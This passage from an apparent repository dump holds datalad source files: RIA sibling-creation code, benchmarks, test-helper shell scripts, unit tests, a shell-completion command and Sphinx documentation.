parse target URL\n try:\n ssh_host, url_base_path, rewritten_url = \\\n verify_ria_url(push_url if push_url else url, ds.config)\n except ValueError as e:\n yield get_status_dict(\n status='error',\n message=str(e),\n **res_kwargs\n )\n return\n\n local_base_path = Path(url_path2local_path(url_base_path))\n\n git_url = decode_source_spec(\n # append dataset id to url and use magic from clone-helper:\n url + '#{}'.format(ds.id),\n cfg=ds.config\n )['giturl']\n git_push_url = decode_source_spec(\n push_url + '#{}'.format(ds.id),\n cfg=ds.config\n )['giturl'] if push_url else None\n\n # determine layout locations; go for a v1 store-level layout\n repo_path, _, _ = get_layout_locations(1, local_base_path, ds.id)\n\n ds_siblings = [\n r['name'] for r in ds.siblings(\n result_renderer='disabled',\n return_type='generator')\n ]\n # Figure whether we are supposed to skip this very dataset\n if existing == 'skip' and (\n name in ds_siblings or (\n storage_name and storage_name in ds_siblings)):\n yield get_status_dict(\n status='notneeded',\n message=\"Skipped on existing sibling\",\n **res_kwargs\n )\n # if we skip here, nothing else can change that decision further\n # down\n return\n\n # figure whether we need to skip or error due an existing target repo before\n # we try to init a special remote.\n if ssh_host:\n from datalad import ssh_manager\n ssh = ssh_manager.get_connection(\n ssh_host,\n use_remote_annex_bundle=False)\n ssh.open()\n\n exists = False\n if existing in ['skip', 'error', 'reconfigure']:\n config_path = repo_path / 'config'\n # No .git -- if it's an existing repo in a RIA store it should be a\n # bare repo.\n # Theoretically we could have additional checks for whether we have\n # an empty repo dir or a non-bare repo or whatever else.\n if ssh_host:\n try:\n ssh('[ -e {p} ]'.format(p=quote_cmdlinearg(str(config_path))))\n exists = True\n except CommandError:\n exists = False\n else:\n exists = config_path.exists()\n\n if exists:\n if existing == 'skip':\n # 1. not rendered by default\n # 2. message doesn't show up in ultimate result\n # record as shown by -f json_pp\n yield get_status_dict(\n status='notneeded',\n message=\"Skipped on existing remote \"\n \"directory {}\".format(repo_path),\n **res_kwargs\n )\n return\n elif existing == 'error':\n yield get_status_dict(\n status='error',\n message=\"remote directory {} already \"\n \"exists.\".format(repo_path),\n **res_kwargs\n )\n return\n else:\n # reconfigure will be handled later in the code\n pass\n\n if storage_sibling == 'only':\n lgr.info(\"create storage sibling '%s' ...\", name)\n else:\n lgr.info(\"create sibling%s '%s'%s ...\",\n 's' if storage_name else '',\n name,\n \" and '{}'\".format(storage_name) if storage_name else '',\n )\n create_ds_in_store(SSHRemoteIO(ssh_host) if ssh_host else LocalIO(),\n local_base_path, ds.id, '2', '1', alias,\n init_obj_tree=storage_sibling is not False)\n if storage_sibling:\n # we are using the main `name`, if the only thing we are creating\n # is the storage sibling\n srname = name if storage_sibling == 'only' else storage_name\n\n lgr.debug('init special remote %s', srname)\n special_remote_options = [\n 'type=external',\n 'externaltype=ora',\n 'encryption=none',\n 'autoenable=true',\n 'url={}'.format(url)]\n if push_url:\n special_remote_options.append('push-url={}'.format(push_url))\n try:\n ds.repo.init_remote(\n srname,\n options=special_remote_options)\n except CommandError as e:\n if existing == 'reconfigure' \\\n and 'There is already a special remote' \\\n in e.stderr:\n # run enableremote instead\n lgr.debug(\n \"special remote '%s' already exists. \"\n \"Run enableremote instead.\",\n srname)\n # TODO: Use AnnexRepo.enable_remote (which needs to get\n # `options` first)\n ds.repo.call_annex([\n 'enableremote',\n srname] + special_remote_options)\n else:\n yield get_status_dict(\n status='error',\n message=\"initremote failed.\\nstdout: %s\\nstderr: %s\"\n % (e.stdout, e.stderr),\n **res_kwargs\n )\n return\n\n if trust_level:\n trust_cmd = [trust_level]\n if trust_level == 'trust':\n # Following git-annex 8.20201129-73-g6a0030a11, using `git\n # annex trust` requires --force.\n trust_cmd.append('--force')\n ds.repo.call_annex(trust_cmd + [srname])\n # get uuid for use in bare repo's config\n uuid = ds.config.get(\"remote.{}.annex-uuid\".format(srname))\n\n if storage_sibling == 'only':\n # we can stop here, the rest of the function is about setting up\n # the git remote part of the sibling\n yield get_status_dict(\n status='ok',\n **res_kwargs,\n )\n return\n\n # 2. create a bare repository in-store:\n\n lgr.debug(\"init bare repository\")\n # TODO: we should prob. check whether it's there already. How?\n # Note: like the special remote itself, we assume local FS if no\n # SSH host is specified\n disabled_hook = repo_path / 'hooks' / 'post-update.sample'\n enabled_hook = repo_path / 'hooks' / 'post-update'\n\n if group:\n chgrp_cmd = \"chgrp -R {} {}\".format(\n quote_cmdlinearg(str(group)),\n quote_cmdlinearg(str(repo_path)))\n\n if ssh_host:\n ssh('cd {rootdir} && git init --bare{shared}'.format(\n rootdir=quote_cmdlinearg(str(repo_path)),\n shared=\" --shared='{}'\".format(\n quote_cmdlinearg(shared)) if shared else ''\n ))\n\n if storage_sibling:\n # write special remote's uuid into git-config, so clone can\n # which one it is supposed to be and enable it even with\n # fallback URL\n ssh(\"cd {rootdir} && git config datalad.ora-remote.uuid {uuid}\"\n \"\".format(rootdir=quote_cmdlinearg(str(repo_path)),\n uuid=uuid))\n\n if post_update_hook:\n ssh('mv {} {}'.format(quote_cmdlinearg(str(disabled_hook)),\n quote_cmdlinearg(str(enabled_hook))))\n\n if group:\n # Either repository existed before or a new directory was\n # created for it, set its group to a desired one if was\n # provided with the same chgrp\n ssh(chgrp_cmd)\n\n # finally update server\n if post_update_hook:\n # Conditional on post_update_hook, since one w/o the other doesn't\n # seem to make much sense.\n ssh('cd {rootdir} && git update-server-info'.format(\n rootdir=quote_cmdlinearg(str(repo_path))\n ))\n else:\n gr = GitRepo(repo_path, create=True, bare=True,\n shared=shared if shared else None)\n if exists and existing == 'reconfigure':\n # if the repo exists at the given path, the GitRepo would not\n # (re)-run git init, and just return an instance of GitRepo;\n # skip & error have been handled at this point\n gr.init(\n sanity_checks=False,\n init_options=[\"--bare\"] + ([f\"--shared={shared}\"] if shared else []),\n )\n if storage_sibling:\n # write special remote's uuid into git-config, so clone can\n # which one it is supposed to be and enable it even with\n # fallback URL\n gr.config.add(\"datalad.ora-remote.uuid\", uuid, scope='local')\n\n if post_update_hook:\n disabled_hook.rename(enabled_hook)\n if group:\n # No CWD needed here, since `chgrp` is expected to be found via PATH\n # and the path it's operating on is absolute (repo_path). No\n # repository operation involved.\n Runner().run(chgrp_cmd)\n # finally update server\n if post_update_hook:\n # Conditional on post_update_hook, since one w/o the other doesn't\n # seem to make much sense.\n gr.call_git([\"update-server-info\"])\n\n # add a git remote to the bare repository\n # Note: needs annex-ignore! Otherwise we might push into dirhash\n # lower annex/object tree instead of mixed, since it's a bare\n # repo. This in turn would be an issue, if we want to pack the\n # entire thing into an archive. Special remote will then not be\n # able to access content in the \"wrong\" place within the archive\n lgr.debug(\"set up git remote\")\n if name in ds_siblings:\n # otherwise we should have skipped or failed before\n assert existing == 'reconfigure'\n ds.config.set(\n \"remote.{}.annex-ignore\".format(name),\n value=\"true\",\n scope=\"local\")\n yield from ds.siblings(\n 'configure',\n name=name,\n url=str(repo_path) if url.startswith(\"ria+file\") else git_url,\n pushurl=git_push_url,\n recursive=False,\n # Note, that this should be None if storage_sibling was not set\n publish_depends=storage_name,\n result_renderer='disabled',\n return_type='generator',\n # Note, that otherwise a subsequent publish will report\n # \"notneeded\".\n fetch=True\n )\n\n yield get_status_dict(\n status='ok',\n **res_kwargs,\n )\n" }, { "alpha_fraction": 0.6332270503044128, "alphanum_fraction": 0.6372861862182617, "avg_line_length": 27.741666793823242, "blob_id": "3f9eee88397a24716e236f15383d24e9a1f11c7e", "content_id": "0dbbca320005bce2251af919723cd588fac8f23f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3449, "license_type": "permissive", "max_line_length": 99, "num_lines": 120, "path": "/benchmarks/api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks of the datalad.api functionality\"\"\"\n\nfrom os.path import join as opj\n\nfrom datalad.api import create\nfrom datalad.api import create_test_dataset\nfrom datalad.api import install\nfrom datalad.api import ls\nfrom datalad.api import drop\n\n#\n# Following ones could be absent in older versions\n#\ntry:\n from datalad.api import diff\nexcept ImportError:\n diff = None\n\ntry:\n from datalad.api import status\nexcept ImportError:\n status = None\n\n\n# Some tracking example -- may be we should track # of datasets.datalad.org\n#import gc\n#def track_num_objects():\n# return len(gc.get_objects())\n#track_num_objects.unit = \"objects\"\n\n\nfrom .common import (\n SampleSuperDatasetBenchmarks,\n SuprocBenchmarks,\n)\n\n\nclass testds(SuprocBenchmarks):\n \"\"\"\n Benchmarks to test on create_test_dataset how fast we could generate datasets\n \"\"\"\n\n def time_create_test_dataset1(self):\n self.remove_paths.extend(\n create_test_dataset(spec='1', seed=0)\n )\n\n def time_create_test_dataset2x2(self):\n self.remove_paths.extend(\n create_test_dataset(spec='2/2', seed=0)\n )\n\n\nclass supers(SampleSuperDatasetBenchmarks):\n \"\"\"\n Benchmarks on common operations on collections of datasets using datalad API\n \"\"\"\n\n def time_installr(self):\n # somewhat duplicating setup but lazy to do different one for now\n assert install(self.ds.path + '_', source=self.ds.path, recursive=True)\n\n def time_createadd(self):\n assert self.ds.create('newsubds')\n\n def time_createadd_to_dataset(self):\n subds = create(opj(self.ds.path, 'newsubds'))\n self.ds.save(subds.path)\n\n def time_ls(self):\n ls(self.ds.path)\n\n def time_ls_recursive(self):\n ls(self.ds.path, recursive=True)\n\n def time_ls_recursive_long_all(self):\n ls(self.ds.path, recursive=True, long_=True, all_=True)\n\n def time_subdatasets(self):\n self.ds.subdatasets()\n\n def time_subdatasets_with_all_paths_recursive(self):\n # to see if we do not get O(N^2) performance\n subdatasets = self.ds.subdatasets(recursive=True, result_xfm='relpaths')\n subdatasets2 = self.ds.subdatasets(path=subdatasets, recursive=True, result_xfm='relpaths')\n assert subdatasets == subdatasets2\n\n def time_subdatasets_recursive(self):\n self.ds.subdatasets(recursive=True)\n\n def time_subdatasets_recursive_first(self):\n next(self.ds.subdatasets(recursive=True, return_type='generator'))\n\n def time_uninstall(self):\n for subm in self.ds.repo.get_submodules_():\n self.ds.drop(subm[\"path\"], recursive=True, what='all',\n reckless='kill')\n\n def time_remove(self):\n drop(self.ds.path, what='all', reckless='kill', recursive=True)\n\n def time_diff(self):\n diff(self.ds.path, revision=\"HEAD^\")\n\n def time_diff_recursive(self):\n diff(self.ds.path, revision=\"HEAD^\", recursive=True)\n\n # Status must be called with the dataset, unlike diff\n def time_status(self):\n self.ds.status()\n\n def time_status_recursive(self):\n self.ds.status(recursive=True)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6779026389122009, "avg_line_length": 21.885713577270508, "blob_id": "4ed02193a49619f1b15d13a522d71588e778aeca", "content_id": "a96d257ab02e6cbfab11e4c1b07fbf10a73dc72b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 801, "license_type": "permissive", "max_line_length": 78, "num_lines": 35, "path": "/tools/eval_under_testloopfs", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Evaluate given command while running with DATALAD_TESTS_TEMP_DIR pointing to\n# that temporary filesystem mounted using loop device\n\nset -e\n\nfs=${DATALAD_TESTS_TEMP_FS:-vfat}\nsize=${DATALAD_TESTS_TEMP_FSSIZE:-10}\n\nset -u\ntmp=$(mktemp -u \"${TMPDIR:-/tmp}/datalad-fs-XXXXX\")\n\necho \"I: $fs of $size: $tmp\"\n\nuid=$(id -u)\nmntimage=\"$tmp.img\"\nmntpoint=\"$tmp\"\n\ndd if=/dev/zero \"of=$mntimage\" bs=1032192c \"count=$size\"\nloop=$(sudo losetup --find --show \"$mntimage\")\nsudo \"mkfs.$fs\" \"$loop\"\nmkdir -p \"$mntpoint\"\nsudo mount -o \"uid=$uid\" \"$loop\" \"$mntpoint\"\n\n# Run the actual command\necho \"I: running $*\"\nset +e\nTMPDIR=\"$mntpoint\" DATALAD_TESTS_TEMP_DIR=\"$mntpoint\" \"$@\"\nret=$?\n\necho \"I: done, unmounting\"\nsudo umount \"$mntpoint\"\nsudo losetup -d \"$loop\"\nrm -rf \"$mntpoint\" \"$mntimage\"\nexit \"$ret\"\n" }, { "alpha_fraction": 0.7039626836776733, "alphanum_fraction": 0.7086247205734253, "avg_line_length": 27.600000381469727, "blob_id": "96db835a0364045265e97b9e10c94bbfd7e761cc", "content_id": "3228ea6360f50de291c739d775d7bb1fc50f63de", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 858, "license_type": "permissive", "max_line_length": 95, "num_lines": 30, "path": "/tools/coverage-bin/datalad", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# A little helper to overload default datalad executables with the one ran\n# through coverage\n\nset -eu\n\nbin=$(basename $0)\ncurbin=$(which \"$bin\")\ncurdatalad=$(which datalad)\ncurdir=$(dirname $curdatalad)\n\nCOVERAGE_RUN=\"-m coverage run\"\nexport COVERAGE_PROCESS_START=$PWD/../.coveragerc\nexport PYTHONPATH=\"$PWD/../tools/coverage-bin/\"\nexport PATH=${PATH//$curdir:/}\nnewdatalad=$(which datalad)\nnewbin=$(which $bin)\nnewpython=$(sed -ne '1s/#!//gp' $newdatalad)\n\nif [ $newdatalad = $curdatalad ]; then\n echo \"E: binary remained the same: $newdatalad\" >&2\n exit 1\nfi\n\ntouch /tmp/coverages\nexport COVERAGE_FILE=/tmp/.coverage-entrypoints-$RANDOM\necho \"Running now $newpython $COVERAGE_RUN --include=datalad/* -a $newbin $@\" >> /tmp/coverages\n#$newpython $COVERAGE_RUN --include=datalad/* -a $newbin \"$@\"\n$newpython $COVERAGE_RUN -a $newbin \"$@\"\n" }, { "alpha_fraction": 0.6317383646965027, "alphanum_fraction": 0.6347668170928955, "avg_line_length": 35.28571319580078, "blob_id": "7e59cf6c9afe62935289605709310e7e632c8a99", "content_id": "30b782186c0567bc30cb6fe83e58d3994d27e585", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3302, "license_type": "permissive", "max_line_length": 92, "num_lines": 91, "path": "/datalad/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nimport os.path as op\nimport sys\nfrom unittest.mock import patch\n\nfrom datalad.cmd import WitlessRunner, StdOutErrCapture\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_raises,\n chpwd,\n get_dataset_root,\n ok_file_has_content,\n swallow_logs,\n with_tree,\n)\nfrom datalad.utils import get_home_envvars\n\n\n# verify that any target platform can deal with forward slashes\n# as os.path.sep, regardless of its native preferences\n@with_tree(tree={'subdir': {'testfile': 'testcontent'}})\ndef test_paths_with_forward_slashes(path=None):\n # access file with native absolute path spec\n print(path)\n ok_file_has_content(op.join(path, 'subdir', 'testfile'), 'testcontent')\n with chpwd(path):\n # native relative path spec\n ok_file_has_content(op.join('subdir', 'testfile'), 'testcontent')\n # posix relative path spec\n ok_file_has_content('subdir/testfile', 'testcontent')\n # abspath with forward slash path sep char\n ok_file_has_content(\n op.join(path, 'subdir', 'testfile').replace(op.sep, '/'),\n 'testcontent')\n\n\n#@with_tempfile(mkdir=True)\n# with_tempfile dereferences tempdir, so does not trigger the failure\n# on Yarik's laptop where TMPDIR=~/.tmp and ~/.tmp -> /tmp.\n# with_tree in turn just passes that ~/.tmp/ directory\n@with_tree(tree={})\ndef test_not_under_git(path=None):\n from datalad.distribution.dataset import require_dataset\n dsroot = get_dataset_root(path)\n assert dsroot is None, \"There must be no dataset above tmp %s. Got: %s\" % (path, dsroot)\n with chpwd(path):\n # And require_dataset must puke also\n assert_raises(\n Exception,\n require_dataset,\n None, check_installed=True, purpose='test'\n )\n\n\ndef test_no_empty_http_proxy():\n # in __init__ we might prune http_proxy if it is empty, so it must not be\n # empty if present\n assert os.environ.get('http_proxy', 'default')\n assert os.environ.get('https_proxy', 'default')\n\n\n@with_tree(tree={})\ndef test_git_config_warning(path=None):\n if 'GIT_AUTHOR_NAME' in os.environ:\n raise SkipTest(\"Found existing explicit identity config\")\n\n # Note: An easier way to test this, would be to just set GIT_CONFIG_GLOBAL\n # to point somewhere else. However, this is not supported by git before\n # 2.32. Hence, stick with changed HOME in this test, but be sure to unset a\n # possible GIT_CONFIG_GLOBAL in addition.\n\n patched_env = os.environ.copy()\n patched_env.pop('GIT_CONFIG_GLOBAL', None)\n patched_env.update(get_home_envvars(path))\n with chpwd(path), \\\n patch.dict('os.environ', patched_env, clear=True), \\\n swallow_logs(new_level=30) as cml:\n out = WitlessRunner().run(\n [sys.executable, '-c', 'import datalad'],\n protocol=StdOutErrCapture)\n assert_in(\"configure Git before\", out['stderr'])\n" }, { "alpha_fraction": 0.6346456408500671, "alphanum_fraction": 0.638582706451416, "avg_line_length": 35.28571319580078, "blob_id": "f36a4960725987e9769da9b095407ba40aff7085", "content_id": "eee89301cc0fcd47523913fa345b396af394a10a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2540, "license_type": "permissive", "max_line_length": 81, "num_lines": 70, "path": "/datalad/support/tests/test_due_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import logging\nfrom unittest.mock import patch\n\nfrom ...distribution import dataset as dataset_mod\nfrom ...distribution.dataset import Dataset\nfrom ...tests.utils_pytest import (\n swallow_logs,\n with_tempfile,\n)\nfrom ..due import (\n Doi,\n Text,\n due,\n)\nfrom ..due_utils import duecredit_dataset\nfrom ..external_versions import external_versions\n\n\n@with_tempfile(mkdir=True)\ndef test_duecredit_dataset(path=None):\n dataset = Dataset(path)\n\n # Verify that we do not call duecredit_dataset if due is not enabled\n # Seems can't patch.object.enabled so we will just test differently\n # depending on either enabled or not\n if not due.active:\n with patch.object(dataset_mod, 'duecredit_dataset') as cmdc:\n dataset.create()\n cmdc.assert_not_called()\n else:\n with patch.object(dataset_mod, 'duecredit_dataset') as cmdc:\n dataset.create()\n cmdc.assert_called_once_with(dataset)\n\n\n # note: doesn't crash even if we call it incorrectly (needs dataset)\n duecredit_dataset()\n\n # No metadata -- no citation ATM.\n # TODO: possibly reconsider - may be our catch-all should be used there\n # as well\n with patch.object(due, 'cite') as mcite:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n duecredit_dataset(dataset) # should not crash or anything\n # since no metadata - we issue warning and return without citing\n # anything\n cml.assert_logged(\n regex='.*Failed to obtain metadata.*Will not provide duecredit.*'\n )\n mcite.assert_not_called()\n\n # Below we will rely on duecredit Entries being comparable, so if\n # duecredit is available and does not provide __cmp__ we make it for now\n # Whenever https://github.com/duecredit/duecredit/pull/148 is merged, and\n # probably 0.7.1 released - we will eventually remove this monkey patching.\n # Checking if __eq__ was actually provided seems tricky on py2, so decided\n # to just do version comparison\n try:\n if external_versions['duecredit'] < '0.7.1':\n from duecredit.entries import DueCreditEntry\n def _entry_eq(self, other):\n return (\n (self._rawentry == other._rawentry) and\n (self._key == other._key)\n )\n DueCreditEntry.__eq__ = _entry_eq\n except:\n # assume that not present so donothing stubs would be used, and\n # we will just compare Nones\n pass\n" }, { "alpha_fraction": 0.6086796522140503, "alphanum_fraction": 0.6138285994529724, "avg_line_length": 28.55434799194336, "blob_id": "1b30e0d69f14a1cf4ec4cc1e6c188a81da1d27ff", "content_id": "85e3c237021919a22f3a2aa3b1404b10a23a7ff4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2719, "license_type": "permissive", "max_line_length": 199, "num_lines": 92, "path": "/datalad/interface/shell_completion.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"A helper command to enable shell (bash, zsh) completion for DataLad\n\n\"\"\"\n__docformat__ = 'restructuredtext'\n\n\nfrom .base import Interface\n\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.exceptions import CapturedException\n\nfrom logging import getLogger\n\nlgr = getLogger(\"datalad.interface.shell_completion\")\n\n\n@build_doc\nclass ShellCompletion(Interface):\n \"\"\"Display shell script for enabling shell completion for DataLad.\n\n Output of this command should be \"sourced\" by the bash or zsh to enable\n shell completions provided by argcomplete.\n\n Example:\n\n $ source <(datalad shell-completion)\n $ datalad --<PRESS TAB to display available option>\n\n \"\"\"\n # XXX prevent common args from being added to the docstring\n _no_eval_results = True\n result_renderer = 'tailored'\n _params_ = {}\n\n @staticmethod\n @eval_results\n def __call__():\n \"\"\"\n \"\"\"\n try:\n import argcomplete\n except Exception as exc:\n lgr.error(\"argcomplete failed to import - completions unlikely to work.\"\n \" Check if it is installed: %s\", CapturedException(exc))\n content = \"\"\"\\\n# Universal completion script for DataLad with the core autogenerated by\n# python-argcomplete and only slightly improved to work for ZSH if sourced under ZSH.\n#\n# Instead of just running this command and seeing this output, do\n#\n# source <(datalad shell-completion)\n#\n# in your bash or zsh session.\n\nif [ \"${ZSH_VERSION:-}\" != \"\" ]; then\n autoload -U compinit && compinit\n autoload -U bashcompinit && bashcompinit\nfi\n\n_python_argcomplete() {\n local IFS='\u000b'\n COMPREPLY=( $(IFS=\"$IFS\" COMP_LINE=\"$COMP_LINE\" COMP_POINT=\"$COMP_POINT\" _ARGCOMPLETE_COMP_WORDBREAKS=\"$COMP_WORDBREAKS\" _ARGCOMPLETE=1 \"$1\" 8>&1 9>&2 1>/dev/null 2>/dev/null) )\n if [[ $? != 0 ]]; then\n unset COMPREPLY\n fi\n}\n\ncomplete -o nospace -o default -F _python_argcomplete \"datalad\"\n\"\"\"\n yield get_status_dict(\n action='shell_completion',\n status='ok',\n content=content\n )\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n from datalad.ui import ui\n ui.message(res['content'])\n" }, { "alpha_fraction": 0.6380367875099182, "alphanum_fraction": 0.6399539709091187, "avg_line_length": 16.045751571655273, "blob_id": "4030e793697bdb68cf46e1792e031384ff6bde53", "content_id": "180f7f8f15a6ae5c8452093c4e4c0a5f3c34e8c1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2608, "license_type": "permissive", "max_line_length": 77, "num_lines": 153, "path": "/docs/source/modref.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_modref:\n\n***********************\nPython module reference\n***********************\n\nThis module reference extends the manual with a comprehensive overview of the\navailable functionality built into datalad. Each module in the package is\ndocumented by a general summary of its purpose and the list of classes and\nfunctions it provides.\n\n\nHigh-level user interface\n=========================\n\nDataset operations\n------------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.Dataset\n api.create\n api.create_sibling\n api.create_sibling_github\n api.create_sibling_gitlab\n api.create_sibling_gogs\n api.create_sibling_gitea\n api.create_sibling_gin\n api.create_sibling_ria\n api.drop\n api.get\n api.install\n api.push\n api.remove\n api.save\n api.status\n api.update\n api.unlock\n\n\nReproducible execution\n----------------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.run\n api.rerun\n api.run_procedure\n\n\nPlumbing commands\n-----------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.clean\n api.clone\n api.copy_file\n api.create_test_dataset\n api.diff\n api.download_url\n api.foreach_dataset\n api.siblings\n api.sshrun\n api.subdatasets\n\nMiscellaneous commands\n----------------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.add_archive_content\n api.add_readme\n api.addurls\n api.check_dates\n api.configuration\n api.export_archive\n api.export_archive_ora\n api.export_to_figshare\n api.no_annex\n api.shell_completion\n api.wtf\n\nSupport functionality\n=====================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n cmd\n consts\n log\n utils\n version\n support.gitrepo\n support.annexrepo\n support.archives\n support.extensions\n customremotes.base\n customremotes.archives\n\nConfiguration management\n========================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n config\n\nTest infrastructure\n===================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n tests.utils_pytest\n tests.utils_testrepos\n tests.heavyoutput\n\nCommand interface\n=================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n interface.base\n\nCommand line interface infrastructure\n=====================================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n cli.exec\n cli.main\n cli.parser\n cli.renderer\n" }, { "alpha_fraction": 0.5940911769866943, "alphanum_fraction": 0.6008349657058716, "avg_line_length": 24.950000762939453, "blob_id": "5fa06e9c058b5492848874935226e3e6c68ee9ec", "content_id": "11fa31db26b442b8b59798e825cc717fff3bcaf0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3114, "license_type": "permissive", "max_line_length": 92, "num_lines": 120, "path": "/datalad/cli/tests/test_formatters.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\"\"\"\n\nimport importlib.util\nfrom io import StringIO as SIO\nfrom pathlib import Path\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_not_in,\n ok_,\n ok_startswith,\n)\n\nfile_path = \\\n Path(__file__).parents[3] / '_datalad_build_support' / 'formatters.py'\nif not file_path.exists():\n raise SkipTest(f'Cannot find {file_path}')\nspec = importlib.util.spec_from_file_location('formatters', file_path)\nfmt = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(fmt)\n\nfrom ..parser import setup_parser\n\ndemo_example = \"\"\"\n#!/bin/sh\n\nset -e\nset -u\n\n# BOILERPLATE\n\nHOME=IS_MY_CASTLE\n\n#% EXAMPLE START\n#\n# A simple start (on the command line)\n# ====================================\n#\n# Lorem ipsum\n#%\n\ndatalad install http://the.world.com\n\n#%\n# Epilog -- with multiline rubish sdoifpwjefw\n# vsdokvpsokdvpsdkv spdokvpskdvpoksd\n# pfdsvja329u0fjpdsv sdpf9p93qk\n#%\n\ndatalad imagine --too \\\\\n --much \\\\\n --too say \\\\\n yes=no\n\ndatalad shameful-command #% SKIP\n#%\n# The result is not comprehensible.\n#%\n\n#% EXAMPLE END\n\n# define shunit test cases below, or just anything desired\n\"\"\"\n\n\ndef test_cmdline_example_to_rst():\n # don't puke on nothing\n out = fmt.cmdline_example_to_rst(SIO(''))\n out.seek(0)\n ok_startswith(out.read(), '.. AUTO-GENERATED')\n out = fmt.cmdline_example_to_rst(SIO(''), ref='dummy')\n out.seek(0)\n assert_in('.. dummy:', out.read())\n # full scale test\n out = fmt.cmdline_example_to_rst(\n SIO(demo_example), ref='mydemo')\n out.seek(0)\n out_text = out.read()\n assert_in('.. code-block:: sh', out_text)\n assert_not_in('shame', out_text) # no SKIP'ed\n assert_not_in('#', out_text) # no comments\n\n\ndef test_parser_access():\n parsers = setup_parser(['datalad'], return_subparsers=True)\n # we have a bunch\n ok_(len(parsers) > 3)\n assert_in('install', parsers.keys())\n\n\ndef test_manpage_formatter():\n addonsections = {'mytest': \"uniquedummystring\"}\n\n parsers = setup_parser(['datalad'], return_subparsers=True)\n for p in parsers:\n mp = fmt.ManPageFormatter(\n p, ext_sections=addonsections).format_man_page(parsers[p])\n for section in ('SYNOPSIS', 'NAME', 'OPTIONS', 'MYTEST'):\n assert_in('.SH {0}'.format(section), mp)\n assert_in('uniquedummystring', mp)\n\n\ndef test_rstmanpage_formatter():\n parsers = setup_parser(['datalad'], return_subparsers=True)\n for p in parsers:\n mp = fmt.RSTManPageFormatter(p).format_man_page(parsers[p])\n for section in ('Synopsis', 'Description', 'Options'):\n assert_in('\\n{0}'.format(section), mp)\n assert_in('{0}\\n{1}'.format(p, '=' * len(p)), mp)\n" }, { "alpha_fraction": 0.5698767900466919, "alphanum_fraction": 0.5844682455062866, "avg_line_length": 39.182411193847656, "blob_id": "37a25baf7294f73682e037dd459a3a86f1761603", "content_id": "cc1222427b8f39a8909135f09391e96ccc51e78c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12336, "license_type": "permissive", "max_line_length": 79, "num_lines": 